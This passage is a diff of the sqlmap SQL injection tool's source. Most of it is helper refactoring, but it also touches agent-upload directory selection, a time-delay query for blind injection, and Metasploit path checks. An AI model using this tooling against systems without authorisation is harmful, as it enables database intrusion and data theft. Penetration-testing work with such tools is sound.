+                if isWindowsPath(directory):
+                    directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
+                directories.add(directory)
    else:
        warnMsg = "unable to retrieve any web server path"
        logger.warn(warnMsg)

    message   = "please provide any additional web server full path to try "
-    message  += "to upload the agent [%s]: " % defaultDir
-    inputDirs = readInput(message, default=defaultDir)
+    message  += "to upload the agent [%s]: " % ",".join(directory for directory in defaultDirs)
+    inputDirs = readInput(message, default=",".join(directory for directory in defaultDirs))

    if inputDirs:
        inputDirs = inputDirs.replace(", ", ",")
@@ -291,7 +319,7 @@ def getDirs():
            if inputDir:
                directories.add(inputDir)
    else:
-        directories.add(defaultDir)
+        [directories.add(directory) for directory in defaultDirs]

    return directories
    
@@ -436,7 +464,7 @@ def randomInt(length=4):

    return int("".join([random.choice(string.digits) for _ in xrange(0, length)]))

-def randomStr(length=5, lowercase=False):
+def randomStr(length=4, lowercase=False):
    """
    @param length: length of the random string.
    @type length: C{int}
@@ -488,9 +516,9 @@ def banner():
    """

    print """
+    %s - %s
    %s
-    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
-    """ % VERSION_STRING
+    """ % (VERSION_STRING, DESCRIPTION, SITE)
    
 def parsePasswordHash(password):
    blank = " " * 8
@@ -539,6 +567,7 @@ def setPaths():
    paths.SQLMAP_HISTORY         = os.path.join(paths.SQLMAP_ROOT_PATH, ".sqlmap_history")
    paths.SQLMAP_CONFIG          = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
    paths.FUZZ_VECTORS           = os.path.join(paths.SQLMAP_TXT_PATH, "fuzz_vectors.txt")
+    paths.DETECTION_RULES_XML    = os.path.join(paths.SQLMAP_XML_PATH, "detection.xml")
    paths.ERRORS_XML             = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
    paths.QUERIES_XML            = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
    paths.GENERIC_XML            = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
@@ -579,7 +608,11 @@ def parseTargetUrl():
    conf.hostname  = __hostnamePort[0]

    if len(__hostnamePort) == 2:
-        conf.port = int(__hostnamePort[1])
+        try:
+            conf.port = int(__hostnamePort[1])
+        except:
+            errMsg = "invalid target url"
+            raise sqlmapSyntaxException, errMsg
    elif conf.scheme == "https":
        conf.port = 443
    else:
@@ -635,7 +668,7 @@ def getRange(count, dump=False, plusOne=False):
        if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
            limitStart = conf.limitStart

-    if kb.dbms == "Oracle" or plusOne:
+    if plusOne:
        indexRange = range(limitStart, limitStop + 1)
    else:
        indexRange = range(limitStart - 1, limitStop)
@@ -692,7 +725,7 @@ def parseUnionPage(output, expression, partial=False, condition=None, sort=True)

    return data

-def getDelayQuery():
+def getDelayQuery(andCond=False):
    query = None

    if kb.dbms in ("MySQL", "PostgreSQL"):
@@ -703,6 +736,10 @@ def getDelayQuery():

        if (kb.dbms == "MySQL" and banVer >= "5.0.12") or (kb.dbms == "PostgreSQL" and banVer >= "8.2"):
            query = queries[kb.dbms].timedelay % conf.timeSec
+
+            if kb.dbms == "MySQL" and andCond:
+                query = query.replace("SELECT ", "")
+
        else:
            query = queries[kb.dbms].timedelay2 % conf.timeSec
    else:
@@ -805,30 +842,103 @@ def searchEnvPath(fileName):

    return result

-def sanitizeCookie(cookieStr, warn=False):
+def urlEncodeCookieValues(cookieStr):
    if cookieStr:
        result = ""
-        changed = False
        for part in cookieStr.split(';'):
            index = part.find('=') + 1
            if index > 0:
                name = part[:index - 1].strip()
-                value = part[index:].replace(",","%2C").replace(";","%3B").replace(" ","%20")
-                if value != part[index:]:
-                    changed = True
-                result += ";%s=%s" % (name, value)
+                value = urlencode(part[index:], convall=True)
+                result += "; %s=%s" % (name, value)
            elif part.strip().lower() != "secure":
-                result += "%s%s" % ("%3B", part.replace(",","%2C").replace(";","%3B").replace(" ","%20"))
+                result += "%s%s" % ("%3B", urlencode(part, convall=True))
            else:
-                result += ";secure"
-        if result.startswith(';'):
-            result = result[1:]
+                result += "; secure"
+        if result.startswith('; '):
+            result = result[2:]
        elif result.startswith('%3B'):
            result = result[3:]
-        if changed and warn:
-            warnMsg = "cookie is provided in HTTP unsafe format containing one "
-            warnMsg += "of problematic characters: ' ,;'. temporary sanitized."
-            logger.warn(warnMsg)
        return result
    else:
        return None
+
+def directoryPath(path):
+    retVal = None
+    if isWindowsPath(path):
+        retVal = ntpath.dirname(path)
+    else:
+        retVal = posixpath.dirname(path)
+    return retVal
+
+def normalizePath(path):
+    """
+    This function must be called only after posixToNtSlashes()
+    and ntToPosixSlashes()
+    """
+
+    retVal = None
+
+    if isWindowsPath(path):
+        retVal = ntpath.normpath(path)
+    else:
+        retVal = posixpath.normpath(path)
+
+    return retVal
+
+def safeStringFormat(formatStr, params):
+    retVal = formatStr.replace('%d', '%s')
+
+    if isinstance(params, str):
+        retVal = retVal.replace("%s", params)
+    else:
+        count = 0
+        index = 0
+
+        while index != -1:
+            index = retVal.find('%s')
+
+            if index != -1:
+                if count < len(params):
+                    retVal = retVal[:index] + str(params[count]) + retVal[index+2:]
+                else:
+                    raise sqlmapNoneDataException, "wrong number of parameters during string formatting"
+                count += 1
+
+    return retVal
+
+def sanitizeAsciiString(string):
+    return "".join(char if ord(char) < 128 else '?' for char in string)
+
+def decloakToNamedTemporaryFile(filepath, name=None):
+    retVal = NamedTemporaryFile()
+    def __del__():
+        try:
+            if hasattr(retVal, 'old_name'):
+                retVal.name = old_name
+            retVal.close()
+        except OSError:
+            pass
+    retVal.__del__ = __del__
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    if name:
+        retVal.old_name = retVal.name
+        retVal.name = name
+    return retVal
+
+def decloakToMkstemp(filepath, **kwargs):
+    name = mkstemp(**kwargs)[1]
+    retVal = open(name, 'w+b')
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    return retVal
+
+def isWindowsPath(filepath):
+    return re.search("\A[\w]\:\\\\", filepath) is not None
+
+def posixToNtSlashes(filepath):
+    return filepath.replace('/', '\\')
+
+def ntToPosixSlashes(filepath):
+    return filepath.replace('\\', '/')
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,13 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-import md5
-import sha
+try:
+    import hashlib
+except:
+    import md5
+    import sha
+    
+import sys
 import struct
 import urllib

@@ -45,7 +50,10 @@ def hexencode(string):
    return string.encode("hex")

 def md5hash(string):
-    return md5.new(string).hexdigest()
+    if sys.modules.has_key('hashlib'):
+        return hashlib.md5(string).hexdigest()
+    else:
+        return md5.new(string).hexdigest()

 def orddecode(string):
    packedString = struct.pack("!"+"I" * len(string), *string)
@@ -55,7 +63,10 @@ def ordencode(string):
    return tuple([ord(char) for char in string])

 def sha1hash(string):
-    return sha.new(string).hexdigest()
+    if sys.modules.has_key('hashlib'):
+        return hashlib.sha1(string).hexdigest()
+    else:
+        return sha.new(string).hexdigest()

 def urldecode(string):
    result = None
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -124,6 +124,36 @@ class Dump:
                self.__write("    %s: %s" % (subHeader, setting))
        print

+    def dbColumns(self, dbColumns, colConsider, dbs):
+        for column, dbTables in dbColumns.items():
+            if colConsider == "1":
+                colConsiderStr = "s like '" + column + "' were"
+            else:
+                colConsiderStr = " '%s' was" % column
+
+            msg  = "Column%s found in the " % colConsiderStr
+            msg += "following databases:"
+            self.__write(msg)
+
+            printDbs = {}
+
+            for db, tblData in dbs.items():
+                for tbl, colData in tblData.items():
+                    for col, dataType in colData.items():
+                        if column in col:
+                            if db in printDbs:
+                                if tbl in printDbs[db]:
+                                    printDbs[db][tbl][col] = dataType
+                                else:
+                                    printDbs[db][tbl] = { col: dataType }
+                            else:
+                                printDbs[db] = {}
+                                printDbs[db][tbl] = { col: dataType }
+
+                            continue
+
+            self.dbTableColumns(printDbs)
+
    def dbTables(self, dbTables):
        if not isinstance(dbTables, dict):
            self.string("tables", dbTables)
@@ -171,12 +201,16 @@ class Dump:
                for column in colList:
                    colType = columns[column]
                    maxlength1 = max(maxlength1, len(column))
-                    maxlength2 = max(maxlength2, len(colType))
+
+                    if colType is not None:
+                        maxlength2 = max(maxlength2, len(colType))

                maxlength1 = max(maxlength1, len("COLUMN"))
-                maxlength2 = max(maxlength2, len("TYPE"))
                lines1 = "-" * (int(maxlength1) + 2)
-                lines2 = "-" * (int(maxlength2) + 2)
+
+                if colType is not None:
+                    maxlength2 = max(maxlength2, len("TYPE"))
+                    lines2 = "-" * (int(maxlength2) + 2)

                self.__write("Database: %s\nTable: %s" % (db, table))

@@ -185,23 +219,42 @@ class Dump:
                else:
                    self.__write("[%d columns]" % len(columns))

-                self.__write("+%s+%s+" % (lines1, lines2))
+                if colType is not None:
+                    self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("+%s+" % lines1)

                blank1 = " " * (maxlength1 - len("COLUMN"))
-                blank2 = " " * (maxlength2 - len("TYPE"))

-                self.__write("| Column%s | Type%s |" % (blank1, blank2))
-                self.__write("+%s+%s+" % (lines1, lines2))
+                if colType is not None:
+                    blank2 = " " * (maxlength2 - len("TYPE"))
+
+                if colType is not None:
+                    self.__write("| Column%s | Type%s |" % (blank1, blank2))
+                    self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("| Column%s |" % blank1)
+                    self.__write("+%s+" % lines1)

                for column in colList:
                    colType = columns[column]
                    blank1 = " " * (maxlength1 - len(column))
-                    blank2 = " " * (maxlength2 - len(colType))
-                    self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))

-                self.__write("+%s+%s+\n" % (lines1, lines2))
+                    if colType is not None:
+                        blank2 = " " * (maxlength2 - len(colType))
+                        self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
+                    else:
+                        self.__write("| %s%s |" % (column, blank1))
+
+                if colType is not None:
+                    self.__write("+%s+%s+\n" % (lines1, lines2))
+                else:
+                    self.__write("+%s+\n" % lines1)

    def dbTableValues(self, tableValues):
+        if tableValues is None:
+            return
+
        db = tableValues["__infos__"]["db"]
        if not db:
            db = "All"
@@ -249,9 +302,9 @@ class Dump:
                self.__write("| %s%s" % (column, blank), n=False)

                if not conf.multipleTargets and field == fields:
-                    dataToDumpFile(dumpFP, "\"%s\"" % column)
+                    dataToDumpFile(dumpFP, "%s" % column)
                elif not conf.multipleTargets:
-                    dataToDumpFile(dumpFP, "\"%s\"," % column)
+                    dataToDumpFile(dumpFP, "%s," % column)

                field += 1

--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -35,10 +35,11 @@ import urlparse
 from ConfigParser import ConfigParser

 from lib.core.common import getFileType
+from lib.core.common import normalizePath
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
 from lib.core.common import randomRange
-from lib.core.common import sanitizeCookie
 from lib.core.common import sanitizeStr
 from lib.core.data import conf
 from lib.core.data import kb
@@ -67,6 +68,7 @@ from lib.core.update import update
 from lib.parse.configfile import configFileParser
 from lib.parse.queriesfile import queriesParser
 from lib.request.proxy import ProxyHTTPSHandler
+from lib.request.certhandler import HTTPSCertAuthHandler
 from lib.utils.google import Google

 authHandler  = urllib2.BaseHandler()
@@ -102,6 +104,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
    port   = None
    scheme = None

+    if conf.scope:
+        logger.info("using regular expression '%s' for filtering targets" % conf.scope)
+
    for request in reqResList:
        if scheme is None:
            schemePort = re.search("\d\d[\:|\.]\d\d[\:|\.]\d\d\s+(http[\w]*)\:\/\/.*?\:([\d]+)", request, re.I)
@@ -162,6 +167,9 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
                data   = line
                params = True

+        if conf.scope:
+            getPostReq &= re.search(conf.scope, host) is not None
+
        if getPostReq and params:
            if not url.startswith("http"):
                url    = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
@@ -263,6 +271,109 @@ def __setGoogleDorking():
        errMsg += "have GET parameters to test for SQL injection"
        raise sqlmapGenericException, errMsg

+def __setRequestFromFile():
+    """
+    This function checks if the way to make a HTTP request is through supplied
+    textual file, parses it and saves the information into the knowledge base.
+    """
+
+    if not conf.requestFile:
+        return
+    
+    conf.requestFile = os.path.expanduser(conf.requestFile)
+    
+    infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+    logger.info(infoMsg)
+
+    if not os.path.isfile(conf.requestFile):
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' does not exist" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    fp = open(conf.requestFile, "r")
+    fread = fp.read()
+    fread = fread.replace("\r", "")
+    fp.close()
+    
+    lines = fread.split("\n")
+    
+    if len(lines) == 0:
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' has no content" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    if not (lines[0].upper().startswith("GET ") or lines[0].upper().startswith("POST ")):
+        errMsg =  "the specified HTTP request file "
+        errMsg += "doesn't start with GET or POST keyword"
+        raise sqlmapFilePathException, errMsg
+
+    
+    if lines[0].upper().startswith("GET "):
+        index = 4
+    else:
+        index = 5
+
+    if lines[0].upper().find(" HTTP/") == -1:
+        errMsg  = "the specified HTTP request file " 
+        errMsg += "has a syntax error at line: 1"
+        raise sqlmapFilePathException, errMsg
+        
+    host = None
+    headers = ""
+    page = lines[0][index:lines[0].index(" HTTP/")]
+    
+    if conf.method:
+        warnMsg  = "HTTP method previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.method = lines[0][:index-1]
+
+    for index in xrange(1, len(lines) - 1):
+        line = lines[index]
+        valid = True
+        
+        if len(line) == 0:
+            break
+        
+        headers += line + "\n"
+        
+        items = line.split(': ')
+        if len(items) != 2:
+            valid = False
+        else:
+            if items[0].upper() == "HOST":
+                host = items[1]
+                
+        if not valid:
+            errMsg  = "the specified HTTP request file" 
+            errMsg += "has a syntax error at line: %d" % (index + 1)
+            raise sqlmapFilePathException, errMsg
+    
+    if conf.headers and headers:
+        warnMsg  = "HTTP headers previously set. overriding it with "
+        warnMsg += "the value(s) supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.headers = headers.strip("\n")
+    
+    if fread.find("\n\n") != -1:
+        if conf.data:
+            warnMsg  = "HTTP POST data previously set. overriding it with "
+            warnMsg += "the value supplied from the HTTP request file"
+            logger.warn(warnMsg)
+        conf.data = fread[fread.index('\n\n')+2:].strip("\n")
+    
+    if conf.url:
+        warnMsg  = "target url previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+        
+    if host:
+        conf.url = "%s%s" % (host, page)
+    else:
+        errMsg  = "mandatory HTTP header HOST is missing in "
+        errMsg += "the HTTP request file"
+        raise sqlmapFilePathException, errMsg
+            
 def __setMetasploit():
    if not conf.osPwn and not conf.osSmb and not conf.osBof:
        return
@@ -320,11 +431,11 @@ def __setMetasploit():
            raise sqlmapMissingPrivileges, errMsg

    if conf.msfPath:
-        condition  = os.path.exists(os.path.normpath(conf.msfPath))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfcli")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfconsole")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfencode")))
-        condition &= os.path.exists(os.path.normpath(os.path.join(conf.msfPath, "msfpayload")))
+        condition  = os.path.exists(normalizePath(conf.msfPath))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfcli")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfconsole")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfencode")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfpayload")))

        if condition:
            debugMsg  = "provided Metasploit Framework 3 path "
@@ -359,11 +470,11 @@ def __setMetasploit():

        for envPath in envPaths:
            envPath    = envPath.replace(";", "")
-            condition  = os.path.exists(os.path.normpath(envPath))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfcli")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfconsole")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfencode")))
-            condition &= os.path.exists(os.path.normpath(os.path.join(envPath, "msfpayload")))
+            condition  = os.path.exists(normalizePath(envPath))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfcli")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfconsole")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfencode")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))

            if condition:
                infoMsg  = "Metasploit Framework 3 has been found "
@@ -486,6 +597,8 @@ def __setHTTPProxy():
    global proxyHandler

    if not conf.proxy: 
+        if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
+            proxyHandler = urllib2.ProxyHandler({})
        return

    debugMsg = "setting the HTTP proxy to pass by all HTTP requests"
@@ -499,7 +612,10 @@ def __setHTTPProxy():
    __port         = None

    if len(__hostnamePort) == 2:
-        __port = int(__hostnamePort[1])
+        try:
+            __port = int(__hostnamePort[1])
+        except:
+            pass #drops into the next check block

    if not __scheme or not __hostname or not __port:
        errMsg = "proxy value must be in format 'http://url:port'"
@@ -518,13 +634,14 @@ def __setHTTPProxy():

 def __setHTTPAuthentication():
    """
-    Check and set the HTTP authentication method (Basic, Digest or NTLM),
-    username and password to perform HTTP requests with.
+    Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate),
+    username and password for first three methods, or key file and certification file for
+    certificate authentication
    """

    global authHandler

-    if not conf.aType and not conf.aCred:
+    if not conf.aType and not conf.aCred and not conf.aCert:
        return

    elif conf.aType and not conf.aCred:
@@ -537,45 +654,67 @@ def __setHTTPAuthentication():
        errMsg += "but did not provide the type"
        raise sqlmapSyntaxException, errMsg

-    debugMsg = "setting the HTTP authentication type and credentials"
-    logger.debug(debugMsg)
+    if not conf.aCert:
+        debugMsg = "setting the HTTP authentication type and credentials"
+        logger.debug(debugMsg)
    
-    aTypeLower = conf.aType.lower()
+        aTypeLower = conf.aType.lower()
    
-    if aTypeLower not in ( "basic", "digest", "ntlm" ):
-        errMsg  = "HTTP authentication type value must be "
-        errMsg += "Basic, Digest or NTLM"
-        raise sqlmapSyntaxException, errMsg
+        if aTypeLower not in ( "basic", "digest", "ntlm" ):
+            errMsg  = "HTTP authentication type value must be "
+            errMsg += "Basic, Digest or NTLM"
+            raise sqlmapSyntaxException, errMsg
    
-    aCredRegExp = re.search("^(.*?)\:(.*?)$", conf.aCred)
+        aCredRegExp = re.search("^(.*?)\:(.*?)$", conf.aCred)
    
-    if not aCredRegExp:
-        errMsg  = "HTTP authentication credentials value must be "
-        errMsg += "in format username:password"
-        raise sqlmapSyntaxException, errMsg
+        if not aCredRegExp:
+            errMsg  = "HTTP authentication credentials value must be "
+            errMsg += "in format username:password"
+            raise sqlmapSyntaxException, errMsg
    
-    authUsername = aCredRegExp.group(1)
-    authPassword = aCredRegExp.group(2)
+        authUsername = aCredRegExp.group(1)
+        authPassword = aCredRegExp.group(2)
    
-    passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
-    passwordMgr.add_password(None, "%s://%s" % (conf.scheme, conf.hostname), authUsername, authPassword)
+        passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
+        passwordMgr.add_password(None, "%s://%s" % (conf.scheme, conf.hostname), authUsername, authPassword)
    
-    if aTypeLower == "basic":
-        authHandler = urllib2.HTTPBasicAuthHandler(passwordMgr)
+        if aTypeLower == "basic":
+            authHandler = urllib2.HTTPBasicAuthHandler(passwordMgr)
    
-    elif aTypeLower == "digest":
-        authHandler = urllib2.HTTPDigestAuthHandler(passwordMgr)
+        elif aTypeLower == "digest":
+            authHandler = urllib2.HTTPDigestAuthHandler(passwordMgr)
    
-    elif aTypeLower == "ntlm":
-        try:
-            from ntlm import HTTPNtlmAuthHandler
-        except ImportError, _:
-            errMsg  = "sqlmap requires Python NTLM third-party library "
-            errMsg += "in order to authenticate via NTLM, "
-            errMsg += "http://code.google.com/p/python-ntlm/"
-            raise sqlmapMissingDependence, errMsg
+        elif aTypeLower == "ntlm":
+            try:
+                from ntlm import HTTPNtlmAuthHandler
+            except ImportError, _:
+                errMsg  = "sqlmap requires Python NTLM third-party library "
+                errMsg += "in order to authenticate via NTLM, "
+                errMsg += "http://code.google.com/p/python-ntlm/"
+                raise sqlmapMissingDependence, errMsg
    
-        authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passwordMgr)
+            authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passwordMgr)
+    else:
+        debugMsg = "setting the HTTP(s) authentication certificate"
+        logger.debug(debugMsg)
+        
+        aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert)
+    
+        if not aCertRegExp:
+            errMsg  = "HTTP authentication certificate option "
+            errMsg += "must be in format key_file,cert_file"
+            raise sqlmapSyntaxException, errMsg
+    
+        #os.path.expanduser for support of paths with ~
+        key_file = os.path.expanduser(aCertRegExp.group(1))
+        cert_file = os.path.expanduser(aCertRegExp.group(2))
+        
+        for file in (key_file, cert_file):
+            if not os.path.exists(file):
+                errMsg  = "File '%s' doesn't exist" % file
+                raise sqlmapSyntaxException, errMsg
+        
+        authHandler = HTTPSCertAuthHandler(key_file, cert_file)

 def __setHTTPMethod():
    """
@@ -717,8 +856,6 @@ def __setHTTPCookies():
        debugMsg = "setting the HTTP Cookie header"
        logger.debug(debugMsg)
        
-        conf.cookie = sanitizeCookie(conf.cookie, True)
-        
        conf.httpHeaders.append(("Connection", "Keep-Alive"))
        conf.httpHeaders.append(("Cookie", conf.cookie))

@@ -774,19 +911,19 @@ def __cleanupOptions():
        conf.delay = float(conf.delay)

    if conf.rFile:
-        conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/"))
+        conf.rFile = normalizePath(ntToPosixSlashes(conf.rFile))

    if conf.wFile:
-        conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/"))
+        conf.wFile = normalizePath(ntToPosixSlashes(conf.wFile))

    if conf.dFile:
-        conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/"))
+        conf.dFile = normalizePath(ntToPosixSlashes(conf.dFile))

    if conf.msfPath:
-        conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/"))
+        conf.msfPath = normalizePath(ntToPosixSlashes(conf.msfPath))

    if conf.tmpPath:
-        conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/"))
+        conf.tmpPath = normalizePath(ntToPosixSlashes(conf.tmpPath))

    if conf.googleDork or conf.list:
        conf.multipleTargets = True
@@ -816,12 +953,15 @@ def __setConfAttributes():
    conf.paramNegative   = False
    conf.path            = None
    conf.port            = None
+    conf.progressWidth   = 54
    conf.retriesCount    = 0
    conf.scheme          = None
    #conf.seqMatcher      = difflib.SequenceMatcher(lambda x: x in " \t")
    conf.seqMatcher      = difflib.SequenceMatcher(None)
+    conf.seqLock         = None
    conf.sessionFP       = None
    conf.start           = True
+    conf.threadContinue  = True
    conf.threadException = False
    conf.wFileType       = None

@@ -934,9 +1074,9 @@ def __setVerbosity():

    if conf.verbose == 1:
        logger.setLevel(logging.INFO)
-    elif conf.verbose > 1 and conf.eta:
-        conf.verbose = 1
-        logger.setLevel(logging.INFO)
+    elif conf.verbose > 2 and conf.eta:
+        conf.verbose = 2
+        logger.setLevel(logging.DEBUG)
    elif conf.verbose == 2:
        logger.setLevel(logging.DEBUG)
    elif conf.verbose == 3:
@@ -977,6 +1117,8 @@ def init(inputOptions=advancedDict()):
    __setKnowledgeBaseAttributes()
    __cleanupOptions()

+    __setRequestFromFile()
+    
    parseTargetUrl()

    __setHTTPTimeout()
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,13 +27,16 @@ optDict = {
            "Target":        {
                               "url":               "string",
                               "list":              "string",
-                               "googleDork":        "string"
+                               "requestFile":       "string",
+                               "googleDork":        "string",
+                               "configFile":        "string"
                             },

            "Request":       {
                               "method":            "string",
                               "data":              "string",
                               "cookie":            "string",
+                               "cookieUrlencode":   "boolean",
                               "dropSetCookie":     "boolean",
                               "referer":           "string",
                               "agent":             "string",
@@ -41,10 +44,14 @@ optDict = {
                               "headers":           "string",
                               "aType":             "string",
                               "aCred":             "string",
+                               "aCert":             "string",
                               "proxy":             "string",
+                               "ignoreProxy":       "boolean",
                               "threads":           "integer",
                               "delay":             "float",
-                               "timeout":           "float"
+                               "timeout":           "float",
+                               "retries":           "integer",
+                               "scope":             "string"
                             },

            "Injection":     {
@@ -56,12 +63,13 @@ optDict = {
                               "string":            "string",
                               "regexp":            "string",
                               "eString":           "string",
-                               "eRegexp":           "string"
+                               "eRegexp":           "string",
                             },

            "Techniques":    {
                               "stackedTest":       "boolean",
                               "timeTest":          "boolean",
+                               "timeSec":           "integer",
                               "unionTest":         "boolean",
                               "uTech":             "string",
                               "unionUse":          "boolean"
@@ -131,6 +139,7 @@ optDict = {

            "Miscellaneous": {
                               "sessionFile":       "string",
+                               "flushSession":      "boolean",
                               "eta":               "boolean",
                               "googlePage":        "integer",
                               "updateAll":         "boolean",
--- a/lib/core/progress.py
+++ b/lib/core/progress.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -23,19 +23,20 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

 from lib.core.common import dataToStdout
+from lib.core.data import conf

 class ProgressBar:
    """
    This class defines methods to update and draw a progress bar
    """

-    def __init__(self, minValue=0, maxValue=10, totalWidth=54):
+    def __init__(self, minValue=0, maxValue=10, totalWidth=None):
        self.__progBar = "[]"
        self.__oldProgBar = ""
        self.__min = int(minValue)
        self.__max = int(maxValue)
        self.__span = self.__max - self.__min
-        self.__width = totalWidth
+        self.__width = totalWidth if totalWidth else conf.progressWidth
        self.__amount = 0
        self.update()

--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
